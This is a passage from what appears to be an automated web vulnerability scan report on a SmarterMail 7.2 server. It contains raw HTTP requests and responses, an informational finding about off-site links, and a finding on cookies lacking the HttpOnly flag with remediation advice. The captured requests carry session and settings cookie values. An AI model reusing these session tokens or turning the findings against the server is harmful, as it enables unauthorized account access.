       <li class='hmItem' id='ctl00_BPH_hmQuickDate_hmQuickDateRoot_QuickDateWeekToDate' style='z-index: 800'><a class='hmA' href='#'>Week to Date</a></li>
       <li class='hmItem' id='ctl00_BPH_hmQuickDate_hmQuickDateRoot_QuickDateMonthToDate' style='z-index: 800'><a class='hmA' href='#'>Month to Date</a></li>
       <li class='hmItem' id='ctl00_BPH_hmQuickDate_hmQuickDateRoot_QuickDateQuarterToDate' style='z-index: 800'><a class='hmA' href='#'>Quarter to Date</a></li>
       <li class='hmItem' id='ctl00_BPH_hmQuickDate_hmQuickDateRoot_QuickDateYearToDate' style='z-index: 800'><a class='hmA' href='#'>Year to Date</a></li>
       <li class='hmItem' id='ctl00_BPH_hmQuickDate_hmQuickDateRoot_QuickDateLastWeek' style='z-index: 800'><a class='hmA' href='#'>Last Week</a></li>
       <li class='hmItem' id='ctl00_BPH_hmQuickDate_hmQuickDateRoot_QuickDateLastMonth' style='z-index: 800'><a class='hmA' href='#'>Last Month</a></li>
       <li class='hmItem' id='ctl00_BPH_hmQuickDate_hmQuickDateRoot_QuickDateLastQuarter' style='z-index: 800'><a class='hmA' href='#'>Last Quarter</a></li>
       <li class='hmItem hmLast' id='ctl00_BPH_hmQuickDate_hmQuickDateRoot_QuickDateLastYear' style='z-index: 800'><a class='hmA' href='#'>Last Year</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
</ul>
</div>

   <div id="ctl00_BPH_PrinterIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="javascript:PrintReport('reportitem', '3C423C57823C4B519A0426B8EF6C15D5');; return false;"><span class="BBInner">Print</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
   

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_ReportContainer">
   <div id="ctl00_MPH_InternalUpdatePanel0">
       <div id="ctl00_MPH_InternalReportItem0">
           <div class='ReportOptionsBar'>
           <div class='ReportOptionSection'><table cellspacing='0' class='ReportOptionSection'><tr>
           <td class='ReportTitle'>Disk Usage Summary</td>
           <td class='ReportSubTitle'>(dummy@hoytllc.com)</td>
           </tr></table></div>
           <div class='ReportOptionSection'>
           <div><table cellspacing='0' class='ReportOptionSection'><tr>
           </tr></table></div>
           <div><table cellspacing='0' class='ReportOptionSection'><tr>
           <td class='ReportOptions'>
           <span class='ReportOption'><div class='hmReportOption' id='ctl00_MPH_InternalReportItem0_TableMenu_S_Inline'><a href='#' class='hmInline'><div class='hmInlineText'>Table</div><span class='hmArrow'></span><div style='clear:both'></div></a></div>
           
<!-- HyperMenu -->
           <div class='hmReportOption '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmReportOption hmSub hmContext hmList' id='ctl00_MPH_InternalReportItem0_TableMenu_S' name='ctl00$MPH$InternalReportItem0$TableMenu$S' style='z-index:2'>
               <li class='hmItem hmFirst hmCheckable' id='ctl00_MPH_InternalReportItem0_TableMenu_S_MI0' style='z-index: 2'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_TableMenu_S_MI0_CB' group='ctl00_MPH_InternalReportItem0_TableMenu0' type='checkbox'></div>10 Rows</a></li>
               <li class='hmItem hmCheckable hmChecked' id='ctl00_MPH_InternalReportItem0_TableMenu_S_MI1' style='z-index: 2'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_TableMenu_S_MI1_CB' group='ctl00_MPH_InternalReportItem0_TableMenu0' type='checkbox'checked='checked'></div>100 Rows</a></li>
               <li class='hmItem hmCheckable' id='ctl00_MPH_InternalReportItem0_TableMenu_S_MI2' style='z-index: 2'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_TableMenu_S_MI2_CB' group='ctl00_MPH_InternalReportItem0_TableMenu0' type='checkbox'></div>500 Rows</a></li>
               <li class='hmItem hmCheckable' id='ctl00_MPH_InternalReportItem0_TableMenu_S_MI3' style='z-index: 2'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_TableMenu_S_MI3_CB' group='ctl00_MPH_InternalReportItem0_TableMenu0' type='checkbox'></div>1,000 Rows</a></li>
               <li class='hmItem hmLast hmCheckable' id='ctl00_MPH_InternalReportItem0_TableMenu_S_MI4' style='z-index: 2'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_TableMenu_S_MI4_CB' group='ctl00_MPH_InternalReportItem0_TableMenu0' type='checkbox'></div>10,000 Rows</a></li>
           </ul>
           <div class='hmScrollDown'></div></div>
           </div>
           </span></td>
           <td class='ReportOptions'>
           <span class='ReportOption'><div class='hmReportOption' id='ctl00_MPH_InternalReportItem0_ChartMenu_S_Inline'><a href='#' class='hmInline'><div class='hmInlineText'>Chart</div><span class='hmArrow'></span><div style='clear:both'></div></a></div>
           
<!-- HyperMenu -->
           <div class='hmReportOption '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmReportOption hmSub hmContext hmList' id='ctl00_MPH_InternalReportItem0_ChartMenu_S' name='ctl00$MPH$InternalReportItem0$ChartMenu$S' style='z-index:3'>
               <li class='hmItem hmFirst' id='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI' style='z-index: 3'><a class='hmA hmHasChildren' href='#'>Chart Type<span class='hmArrow'></span></a>
               <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
                   <li class='hmItem hmFirst hmCheckable' id='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI0' style='z-index: 3'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI0_CB' group='ctl00_MPH_InternalReportItem0_ChartMenu0' type='checkbox'></div>No Chart</a></li>
                   <li class='hmItem hmCheckable' id='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI1' style='z-index: 3'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI1_CB' group='ctl00_MPH_InternalReportItem0_ChartMenu0' type='checkbox'></div>Area</a></li>
                   <li class='hmItem hmCheckable hmChecked' id='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI2' style='z-index: 3'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI2_CB' group='ctl00_MPH_InternalReportItem0_ChartMenu0' type='checkbox'checked='checked'></div>Bar</a></li>
                   <li class='hmItem hmCheckable' id='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI3' style='z-index: 3'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI3_CB' group='ctl00_MPH_InternalReportItem0_ChartMenu0' type='checkbox'></div>Line</a></li>
                   <li class='hmItem hmLast hmCheckable' id='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI4' style='z-index: 3'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI4_CB' group='ctl00_MPH_InternalReportItem0_ChartMenu0' type='checkbox'></div>Pie</a></li>
               </ul><div class='hmScrollDown'></div></div>
               </li>
               <li class='hmItem' id='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI' style='z-index: 3'><a class='hmA hmHasChildren' href='#'>Chart Display<span class='hmArrow'></span></a>
               <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
                   <li class='hmItem hmFirst hmCheckable' id='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI5' style='z-index: 3'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI5_CB' group='ctl00_MPH_InternalReportItem0_ChartMenu1' type='checkbox'></div>2D (Flat)</a></li>
                   <li class='hmItem hmLast hmCheckable hmChecked' id='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI6' style='z-index: 3'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI6_CB' group='ctl00_MPH_InternalReportItem0_ChartMenu1' type='checkbox'checked='checked'></div>3D</a></li>
               </ul><div class='hmScrollDown'></div></div>
               </li>
               <li class='hmSeperator' style='z-index:3'><span><!-- --></span></li>
               <li class='hmItem hmLast hmCheckable hmChecked' id='ctl00_MPH_InternalReportItem0_ChartMenu_S_MI7' style='z-index: 3'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_ChartMenu_S_MI7_CB' group='' type='checkbox'checked='checked'></div>Disk Usage</a></li>
           </ul>
           <div class='hmScrollDown'></div></div>
           </div>
           </span></td><td class='ReportOptions'>
           <span class='ReportOption'><div class='hmReportOption' id='ctl00_MPH_InternalReportItem0_SortMenu_S_Inline'><a href='#' class='hmInline'><div class='hmInlineText'>Sort</div><span class='hmArrow'></span><div style='clear:both'></div></a></div>
           
<!-- HyperMenu -->
           <div class='hmReportOption '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmReportOption hmSub hmContext hmList' id='ctl00_MPH_InternalReportItem0_SortMenu_S' name='ctl00$MPH$InternalReportItem0$SortMenu$S' style='z-index:2'>
               <li class='hmItem hmFirst hmCheckable' id='ctl00_MPH_InternalReportItem0_SortMenu_S_MI0' style='z-index: 2'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_SortMenu_S_MI0_CB' group='ctl00_MPH_InternalReportItem0_SortMenu0' type='checkbox'></div>Default</a></li>
               <li class='hmItem hmCheckable' id='ctl00_MPH_InternalReportItem0_SortMenu_S_MI1' style='z-index: 2'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_SortMenu_S_MI1_CB' group='ctl00_MPH_InternalReportItem0_SortMenu0' type='checkbox'></div>Folder</a></li>
               <li class='hmItem hmCheckable hmChecked' id='ctl00_MPH_InternalReportItem0_SortMenu_S_MI2' style='z-index: 2'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_SortMenu_S_MI2_CB' group='ctl00_MPH_InternalReportItem0_SortMenu0' type='checkbox'checked='checked'></div>Disk Usage</a></li>
               <li class='hmSeperator' style='z-index:2'><span><!-- --></span></li>
               <li class='hmItem hmCheckable' id='ctl00_MPH_InternalReportItem0_SortMenu_S_MI3' style='z-index: 2'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_SortMenu_S_MI3_CB' group='ctl00_MPH_InternalReportItem0_SortMenu1' type='checkbox'></div>Ascending</a></li>
               <li class='hmItem hmLast hmCheckable hmChecked' id='ctl00_MPH_InternalReportItem0_SortMenu_S_MI4' style='z-index: 2'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_MPH_InternalReportItem0_SortMenu_S_MI4_CB' group='ctl00_MPH_InternalReportItem0_SortMenu1' type='checkbox'checked='checked'></div>Descending</a></li>
           </ul>
           <div class='hmScrollDown'></div></div>
           </div>
           </span></td>
           <td class='GenerateReportButton'>
           <div id="ctl00_MPH_InternalReportItem0_GenerateReport" class="BBButton RefreshButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$MPH$InternalReportItem0$GenerateReport',''); return false;"><span class="BBInner"></span></a></div></td>
           </tr></table></div>
           </div>
           </div>
           
<!-- AUTO CODE GENERATED BY REPORT ENGINE -->
<div class="Report" id="3C423C57823C4B519A0426B8EF6C15D5">
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=a541c1a009544d33beb28b01c1a4dc87.png' /></div>
<table cellspacing='0' class='ReportTable'>
<thead>
<tr>
   <th class='lc rank ac'>Rank</th>
   <th class='al'>Folder</th>
   <th class='rc ar'>Disk Usage</th>
</tr>
</thead>
<tbody>
<tr>
   <td class='lc rank ac'>1</td>
   <td class='al'>Deleted Items</td>
   <td class='rc ar'>-</td>
</tr>
<tr class='alt'>
   <td class='lc rank ac'>2</td>
   <td class='al'>Inbox</td>
   <td class='rc ar'>-</td>
</tr>
<tr>
   <td class='lc rank ac'>3</td>
   <td class='al'>[File Storage]</td>
   <td class='rc ar'>-</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
   <td class='FooterOther lc al' colspan='2'>Max Disk Space</td>
   <td class='FooterOther lc rc ar'>100 MB</td>
</tr>
<tr>
   <td class='lc nw al' colspan='2'>Total</td>
   <td class='rc ar'>0 MB</td>
</tr>
<tr class='alt'>
   <td class='lc nw al' colspan='2'>Average</td>
   <td class='rc ar'>0 MB</td>
</tr>
</tfoot>
</table>
</div>
<!-- END AUTO CODE GENERATED BY REPORT ENGINE -->



       </div>
   </div>
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('reports/frmreport', '/Reports/3C423C57823C4B519A0426B8EF6C15D5');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       var image = $('img.ChartImage');
       var startingWidth = image.width();
       var startingHeight = image.height();
       var ratio = image.width() / image.height();
       
       document.AdditionalResizeEvent = function() {
           var scrollableWidth = $('#Scrollable').innerWidth();
           $('img.ChartImage').width(scrollableWidth < startingWidth ? scrollableWidth : startingWidth)
               .height(scrollableWidth < startingWidth ? scrollableWidth / ratio : startingHeight);
       }

       function ReloadLeftBar() { parent.UpdateSection('reload'); }

       function AddFavoritePopup(reportID) { SpawnHyperWindow("/UserControls/Popups/frmAddFavoriteReport.aspx?level=user&reportID=" + reportID, 400, 400); }

       function ExportReportPopup(reportID, reportType, currentDomain, currentUser) {
           var curDomain = currentDomain != "" ? ("&domain=" + currentDomain) : "";
           var curUser = currentUser != "" ? ("&user=" + currentUser) : "";
           SpawnHyperWindow("/Reports/Controls/frmExportReport.aspx?level=user&reportID=" + reportID + "&reportType=" + reportType + curDomain + curUser, 400, 250);
       }

       function EmailReportPopup(reportID, reportType, currentDomain, currentUser) {
           var curDomain = currentDomain != "" ? ("&domain=" + currentDomain) : "";
           var curUser = currentUser != "" ? ("&user=" + currentUser) : "";
           SpawnHyperWindow("/Reports/Controls/frmEmailReport.aspx?level=user&reportID=" + reportID + "&reportType=" + reportType + curDomain + curUser, 460, 390);
       }

       function ManageReportPopup(reportID, manageType) {
           var url = "/UserControls/Popups/frmAddReportItem.aspx?level=user&";
           if (manageType == "favorite") url += "favoriteID=" + reportID;
           else if (manageType == "custom") url += "customID=" + reportID;

           if (reportID != "")
               GenericPopup(url, "manageReportWindow", "width=500,height=400,resizable=yes,status=no");
       }

       function DeleteReportPopup(reportID, manageType) {
           var url = "/UserControls/Popups/frmDeleteConfirm.aspx?level=user&";
           if (manageType == "favorite") url += "favoriteID=" + reportID;
           SpawnHyperWindow(url, 380, 200);
       }

       function PrintReport(type, reportId) {
           if (reportId != "") reportId = "&reportId=" + reportId;
           parent.GenericPopup("/Reports/frmPrintPreview.aspx?level=user&type=" + type + reportId, "PrintPreview",
        "width=700,height=500,resizable=yes,scrollbars=yes,status=no");
       }

   </script>


   

<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fReports\x2ffrmReport\x2easpx?level\x3duser\x26reportid\x3d3C423C57823C4B519A0426B8EF6C15D5\x26MyReports'); });
Sys.Application.initialize();
$(function() { SetTopTitle('View\x20Report\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
$(function() { $('#ctl00_BPH_hmQuickDate').hyperMenu({"ClearFloat":false,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_BPH_hmQuickDate_hmQuickDateRoot":"return false;"},"ClientCallbacks":{}}); });
$('#ctl00_MPH_InternalReportItem0_TableMenu_S_Inline').click(function (evt) { var Pos = $(this).position(); var Height = $(this).height(); $('#ctl00_MPH_InternalReportItem0_TableMenu_S').showHyperContextMenu({clientX: Pos.left, clientY: Pos.top + Height}, this); evt.stopImmediatePropagation(); });$(function() { $('#ctl00_MPH_InternalReportItem0_TableMenu_S').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_InternalReportItem0_TableMenu_S_MI0":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_TableMenu_S_MI1":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_TableMenu_S_MI2":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_TableMenu_S_MI3":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_TableMenu_S_MI4":"event.doNotCloseMenu = true; return false;"},"ClientCallbacks":{}}); });
$('#ctl00_MPH_InternalReportItem0_ChartMenu_S_Inline').click(function (evt) { var Pos = $(this).position(); var Height = $(this).height(); $('#ctl00_MPH_InternalReportItem0_ChartMenu_S').showHyperContextMenu({clientX: Pos.left, clientY: Pos.top + Height}, this); evt.stopImmediatePropagation(); });$(function() { $('#ctl00_MPH_InternalReportItem0_ChartMenu_S').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI":"return false;","ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI0":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI1":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI2":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI3":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI4":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI5":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI_MI6":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_ChartMenu_S_MI7":"event.doNotCloseMenu = true; return false;"},"ClientCallbacks":{}}); });
$('#ctl00_MPH_InternalReportItem0_SortMenu_S_Inline').click(function (evt) { var Pos = $(this).position(); var Height = $(this).height(); $('#ctl00_MPH_InternalReportItem0_SortMenu_S').showHyperContextMenu({clientX: Pos.left, clientY: Pos.top + Height}, this); evt.stopImmediatePropagation(); });$(function() { $('#ctl00_MPH_InternalReportItem0_SortMenu_S').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_InternalReportItem0_SortMenu_S_MI0":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_SortMenu_S_MI1":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_SortMenu_S_MI2":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_SortMenu_S_MI3":"event.doNotCloseMenu = true; return false;","ctl00_MPH_InternalReportItem0_SortMenu_S_MI4":"event.doNotCloseMenu = true; return false;"},"ClientCallbacks":{}}); });
//]]>
</script>
</form>
</body>
</html>


5.2. http://vulnerable.smartermail.site:9998/UserControls/Popups/frmHelp.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /UserControls/Popups/frmHelp.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /UserControls/Popups/frmHelp.aspx?url= HTTP/1.1
Host: vulnerable.smartermail.site:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smartermail.site:9998/Default.aspx
Cookie: SelectedLanguage=; STTTState=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; STHashCookie={"CountsGuid":"878548840","TopBarSection":"UserStorage"}; ASP.NET_SessionId=dbg5avn0mzbrp22rculzvx55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:43:00 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5760
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
   SmarterMail Help
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="innerpopup" dir="ltr">
   <form method="post" action="frmHelp.aspx?url=" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjQ2NDIwNzYxDxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYGAgUPFgIeB1Zpc2libGVoZAIHD2QWAmYPZBYCAgEPFgIfAmgWAgIBDxYCHgRUZXh0ZWQCCw9kFggCAw8WAh8DBZABPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93d3cuc21hcnRlcnRvb2xzLmNvbS9IZWxwL1NtYXJ0ZXJNYWlsL3Y3L0RlZmF1bHQuYXNweD9wPV9VU1Imdj03LjIuMzkyNSZsYW5nPWVuLVVTJnBhZ2U9Ij5IZWxwIGZvciB0aGlzIFBhZ2U8L2E+ZAIFDxYCHwMFgwE8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3d3dy5zbWFydGVydG9vbHMuY29tL0hlbHAvU21hcnRlck1haWwvdjcvRGVmYXVsdC5hc3B4P3A9X1VTUiZ2PTcuMi4zOTI1Jmxhbmc9ZW4tVVMiPkhlbHAgVG9waWNzPC9hPmQCBw8WAh8DBZYBPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93d3cuc21hcnRlcnRvb2xzLmNvbS9IZWxwL1NtYXJ0ZXJNYWlsL3Y3L0RlZmF1bHQuYXNweD9wPV9VU1Imdj03LjIuMzkyNSZsYW5nPWVuLVVTJnBhZ2U9c2VhcmNoIj5TZWFyY2ggT25saW5lIEhlbHA8L2E+ZAIJDxYCHwMFIVNtYXJ0ZXJNYWlsIEZyZWUgRWRpdGlvbiA3LjIuMzkyNWRkNXk4xAaNQqupM7DogmgKrV0CKzo=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>

       <script language="javascript" type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           $(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
       </script>

       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>

       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="PopupHelp">
       <div class="PopupHeader">
           What do you need help with?
       </div>
       <br />
       <ul class="SettingsBulletedList">
           <li>
               <a target="_blank" href="http://www.smartertools.com/Help/SmarterMail/v7/Default.aspx?p=_USR&v=7.2.3925&lang=en-US&page=">Help for this Page</a></li>
           <li>
               <a target="_blank" href="http://www.smartertools.com/Help/SmarterMail/v7/Default.aspx?p=_USR&v=7.2.3925&lang=en-US">Help Topics</a></li>
           <li>
               <a target="_blank" href="http://www.smartertools.com/Help/SmarterMail/v7/Default.aspx?p=_USR&v=7.2.3925&lang=en-US&page=search">Search Online Help</a></li>
       </ul>
       <br />
   </div>
   <div class="PopupAbout">
       SmarterMail Free Edition 7.2.3925<br />
       Copyright &copy; 2003-2010
       All Rights Reserved.<br />
       <a href="http://www.smartertools.com" id="ctl00_MPH_STLink" target="_blank">http://www.smartertools.com</a>
   </div>

       </div>
       <div id="ctl00_Button" class="PopupButtons">
           <div class="ButtonBarLeft">
               

           </div>
           <div class="ButtonBarRight">
               
   <div id="ctl00_BrPH_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup(); return false;"><span class="BBInner">Close</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
   <span id="ctl00_Scripts_InjectScript"></span>

   

<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserEmail', 0);
UpdateSidebarCounts('UserSync', 0);
Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>


6. Cookie without HttpOnly flag set  previous  next
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. http://vulnerable.smartermail.site:9998/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.aspx HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.smartermail.site:9998/Default.aspx
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
